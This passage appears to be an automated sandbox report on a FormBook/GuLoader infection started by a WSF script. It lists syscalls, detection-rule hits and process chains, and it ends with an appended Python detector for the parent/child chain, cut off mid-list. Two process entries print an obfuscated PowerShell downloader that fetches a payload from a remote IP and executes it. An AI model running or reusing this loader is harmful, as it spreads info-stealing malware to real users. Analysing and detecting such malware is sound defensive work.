Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2E80 NtReadVirtualMemory, 10_2_1FDE2E80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2EA0 NtAdjustPrivilegesToken, 10_2_1FDE2EA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2E30 NtWriteVirtualMemory, 10_2_1FDE2E30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2DD0 NtDelayExecution, 10_2_1FDE2DD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2DB0 NtEnumerateKey, 10_2_1FDE2DB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE3D70 NtOpenThread, 10_2_1FDE3D70
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE3D10 NtOpenProcessToken, 10_2_1FDE3D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2D10 NtMapViewOfSection, 10_2_1FDE2D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2D00 NtSetInformationFile, 10_2_1FDE2D00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2D30 NtUnmapViewOfSection, 10_2_1FDE2D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2CC0 NtQueryVirtualMemory, 10_2_1FDE2CC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2CF0 NtOpenProcess, 10_2_1FDE2CF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2CA0 NtQueryInformationToken, 10_2_1FDE2CA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2C60 NtCreateKey, 10_2_1FDE2C60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2C00 NtQueryInformationProcess, 10_2_1FDE2C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2BF0 NtAllocateVirtualMemory, 10_2_1FDE2BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2BE0 NtQueryValueKey, 10_2_1FDE2BE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2B80 NtQueryInformationFile, 10_2_1FDE2B80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2BA0 NtEnumerateValueKey, 10_2_1FDE2BA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2AD0 NtReadFile, 10_2_1FDE2AD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2AF0 NtWriteFile, 10_2_1FDE2AF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2AB0 NtWaitForSingleObject, 10_2_1FDE2AB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE39B0 NtGetContextThread, 10_2_1FDE39B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE4650 NtSuspendThread, 10_2_1FDE4650
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE4340 NtSetContextThread, 10_2_1FDE4340
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE3090 NtSetValueKey, 10_2_1FDE3090
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE3010 NtOpenDirectoryObject, 10_2_1FDE3010
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B4340 NtSetContextThread,LdrInitializeThunk, 13_2_034B4340
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B3090 NtSetValueKey,LdrInitializeThunk, 13_2_034B3090
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B4650 NtSuspendThread,LdrInitializeThunk, 13_2_034B4650
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B35C0 NtCreateMutant,LdrInitializeThunk, 13_2_034B35C0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2B60 NtClose,LdrInitializeThunk, 13_2_034B2B60
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2BE0 NtQueryValueKey,LdrInitializeThunk, 13_2_034B2BE0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 13_2_034B2BF0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2BA0 NtEnumerateValueKey,LdrInitializeThunk, 13_2_034B2BA0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2AD0 NtReadFile,LdrInitializeThunk, 13_2_034B2AD0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2AF0 NtWriteFile,LdrInitializeThunk, 13_2_034B2AF0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B39B0 NtGetContextThread,LdrInitializeThunk, 13_2_034B39B0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2F30 NtCreateSection,LdrInitializeThunk, 13_2_034B2F30
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2FE0 NtCreateFile,LdrInitializeThunk, 13_2_034B2FE0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2FB0 NtResumeThread,LdrInitializeThunk, 13_2_034B2FB0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2EE0 NtQueueApcThread,LdrInitializeThunk, 13_2_034B2EE0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2E80 NtReadVirtualMemory,LdrInitializeThunk, 13_2_034B2E80
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2D10 NtMapViewOfSection,LdrInitializeThunk, 13_2_034B2D10
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2D30 NtUnmapViewOfSection,LdrInitializeThunk, 13_2_034B2D30
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2DD0 NtDelayExecution,LdrInitializeThunk, 13_2_034B2DD0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2DF0 NtQuerySystemInformation,LdrInitializeThunk, 13_2_034B2DF0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2C60 NtCreateKey,LdrInitializeThunk, 13_2_034B2C60
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2C70 NtFreeVirtualMemory,LdrInitializeThunk, 13_2_034B2C70
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2CA0 NtQueryInformationToken,LdrInitializeThunk, 13_2_034B2CA0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B3010 NtOpenDirectoryObject, 13_2_034B3010
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2B80 NtQueryInformationFile, 13_2_034B2B80
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2AB0 NtWaitForSingleObject, 13_2_034B2AB0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2F60 NtCreateProcessEx, 13_2_034B2F60
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2F90 NtProtectVirtualMemory, 13_2_034B2F90
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2FA0 NtQuerySection, 13_2_034B2FA0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2E30 NtWriteVirtualMemory, 13_2_034B2E30
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2EA0 NtAdjustPrivilegesToken, 13_2_034B2EA0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B3D70 NtOpenThread, 13_2_034B3D70
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2D00 NtSetInformationFile, 13_2_034B2D00
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B3D10 NtOpenProcessToken, 13_2_034B3D10
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2DB0 NtEnumerateKey, 13_2_034B2DB0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2C00 NtQueryInformationProcess, 13_2_034B2C00
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2CC0 NtQueryVirtualMemory, 13_2_034B2CC0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2CF0 NtOpenProcess, 13_2_034B2CF0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D176A0 NtReadFile, 13_2_02D176A0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D17790 NtDeleteFile, 13_2_02D17790
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D17540 NtCreateFile, 13_2_02D17540
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D17830 NtClose, 13_2_02D17830
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D17980 NtAllocateVirtualMemory, 13_2_02D17980
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 1FDF7E54 appears 96 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 1FDE5130 appears 36 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 1FE1EA12 appears 86 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 1FD9B970 appears 268 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 1FE2F290 appears 105 times
Source: C:\Windows\SysWOW64\recover.exe Code function: String function: 034EEA12 appears 84 times
Source: C:\Windows\SysWOW64\recover.exe Code function: String function: 034C7E54 appears 88 times
Source: C:\Windows\SysWOW64\recover.exe Code function: String function: 034B5130 appears 36 times
Source: C:\Windows\SysWOW64\recover.exe Code function: String function: 034FF290 appears 105 times
Source: C:\Windows\SysWOW64\recover.exe Code function: String function: 0346B970 appears 266 times
Source: CDS AC 661171855-VN1 SOA.wsf Initial sample: Strings found which are bigger than 50
Source: amsi64_7108.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_1364.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 0000000A.00000002.2617970698.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.3358657365.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.3358587624.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2641581781.00000000214C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.3358866491.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 7108, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1364, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winWSF@19/8@3/4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Thermoswitch172.Med
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehedxga5.unh.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7108
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1364
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: recover.exe, 0000000D.00000002.3357718213.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3357718213.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3361219173.0000000007C04000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CDS AC 661171855-VN1 SOA.wsf"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . 
DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thermoswitch172.Med && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). 
');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thermoswitch172.Med && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe Process created: C:\Windows\SysWOW64\recover.exe "C:\Windows\SysWOW64\recover.exe"
Source: unknown Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\recover.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
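Read together, the process-creation entries above are the chain the report's signatures score: wscript.exe starting PowerShell, the 64-bit PowerShell re-launching itself from SysWOW64 (the 32-bit GuLoader shellcode needs a 32-bit host), that 32-bit PowerShell starting Windows Mail's wab.exe (the Sigma "Wab/Wabmig Unusual Parent Or Child Processes" hit), and recover.exe, a SysWOW64 disk utility with no business launching a browser, starting Firefox once FormBook has been injected into it. The following is an added example, not code from the report or from Joe Sandbox: a small Python rule set that replays those parent/child pairs (copied from the lines above; parents the report records as "unknown" are modelled as None) and emits one alert per matching rule. The rule names, the process allow-lists and the cmd.exe exclusion on the browser rule are this example's assumptions, not signatures taken from the report.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple

@dataclass(frozen=True)
class ProcEvent:
    parent: Optional[str]  # image path of the creating process; None where the report says "unknown"
    image: str             # image path of the created process

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
WAB = {"wab.exe", "wabmig.exe"}
SYSTEM32 = "c:\\windows\\system32\\"
SYSWOW64 = "c:\\windows\\syswow64\\"

def norm(path: Optional[str]) -> str:
    return (path or "").lower().replace("/", "\\")

def base(path: Optional[str]) -> str:
    return norm(path).rsplit("\\", 1)[-1]

Alert = Tuple[str, str, str]  # (rule name, parent basename, child basename)

def check_chain(events: List[ProcEvent]) -> List[Alert]:
    alerts: List[Alert] = []
    for e in events:
        p, c = base(e.parent), base(e.image)
        parent_path, child_path = norm(e.parent), norm(e.image)
        # 1. Script host handing off to a shell: the WSF dropper's first hop.
        if p in SCRIPT_HOSTS and c in SHELLS:
            alerts.append(("script_host_spawns_shell", p, c))
        # 2. 64-bit PowerShell re-launching itself from SysWOW64 to get a 32-bit host.
        if p == c == "powershell.exe" and parent_path.startswith(SYSTEM32) and child_path.startswith(SYSWOW64):
            alerts.append(("x64_powershell_respawns_x86", p, c))
        # 3. wab.exe / wabmig.exe started by a script host or shell.
        if c in WAB and p in SCRIPT_HOSTS | SHELLS:
            alerts.append(("wab_unusual_parent", p, c))
        # 4. A console utility living in System32/SysWOW64 starting a browser. cmd.exe is
        #    excluded because `start firefox` from a prompt is routine (tuning choice).
        if c in BROWSERS and p != "cmd.exe" and (parent_path.startswith(SYSTEM32) or parent_path.startswith(SYSWOW64)):
            alerts.append(("system_utility_spawns_browser", p, c))
    return alerts

# Parent/child pairs copied from the "Process created" lines above; "unknown" parents are None.
REPORTED_EVENTS = [
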